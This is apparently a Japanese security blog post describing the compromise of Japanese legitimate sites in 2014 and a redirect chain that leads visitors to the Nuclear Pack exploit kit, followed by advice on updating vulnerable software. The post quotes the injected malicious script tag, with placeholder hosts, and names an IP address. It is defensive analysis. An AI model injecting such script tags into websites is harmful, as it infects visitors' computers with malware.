日本の正規サイト複数改ざん? Windowsパソコン対象にウイルス感染攻撃
 
サイト改ざん被害は日常的に起こってるものだけど…
 
2014年8月31日から、特定のサイト改ざんを結構な数で確認してます。<日本のユーザーをターゲットにしてるっぽい雰囲気?
 
http://(日本の正規サイト1)/
 ↓
http://(日本の正規サイト2)/[ランダム英数字].php?id=[ランダム数字]
 ↓ 
http://*****.pw/[ランダム英数字].html ← Nuclear Pack
 
Windowsパソコンをターゲットにしたドライブバイ・ダウンロード攻撃で、ウイルスを強制的にインストールさせるためのエクスプロイトキットAngler Exploit Kit Nuclear Pack です。
 
・ URLアドレス パラオ(*****.pw)
・ IPアドレス 85.17.12.236 (オランダ サーバー)
 
> www.virustotal.com/ja/ip-address/85.17.12.236/information/
日本の正規サイト1 (起点)
個人や企業が管理してる日本の正規サイトたちが第三者にハッキングされ、サイト内の全ページに不正なJavaScriptタグが挿入されてます。
 
イメージ 1
 
イメージ 2
 
イメージ 3 
<script type="text/javascript" src="http://(日本の正規サイト2)/[ランダム英数字].php?id=[ランダム数字]"></script>
社団法人、労働組合、少年スポーツチーム、保育所、レストラン、音楽バンド、NGO団体、農園、美容室、学習塾、個人の趣味ページなど多種多様…
 
殺られてるサイトたちは、9月1日らへんから続々とGoogleセーフブラウジング(検索結果に「このサイトはコンピュータに損害を与える可能性があります」)で警告が出るようになってます。
日本の正規サイト2 (リダイレクター)
なぜかここも個人や企業が管理してる日本の正規サイトたちで、エクスプロイトキットへ転送する踏み台として悪用されてます。
 
イメージ 4
JavaScriptで不正なIFRAMEタグを書き出す処理が降ってくる
 
転送されるのは、1IPアドレスに付き最初の1回という制限がかけられてるようで、2回目は空データが返ります。 

マルウェア

手元では Angler Exploit Kit Nuclear Pack の攻撃処理がうまく動いてくれず、どんなマルウェアが発動してしまうのか分からん。。。

ウイルス感染経路をふさいでおけば感染回避

サイト閲覧でウイルスを強制的にインストールさせるドライブバイ・ダウンロード攻撃で悪用されるのは、4系統旧バージョンにある欠陥(脆弱性)です。
 
なので、ちゃんと最新版に更新しておく、不要なら削除しておけばウイルス感染経路が存在しない状態だから攻撃は成立せず100%感染回避! 
 
定番のウイルス感染経路4系統
 
【1】 Java
【2】 Adobe Reader
【3】 Adobe Flash Player
【4】 Microsoft系 (OS、Internet Explorer、Silverlight、Office など)
 
→ Nuclear Pack に用意されてる攻撃処理
 

 
[4日 追記...]
エクスプロイトキットは Angler Exploit Kit ではなく Nuclear Pack の間違い!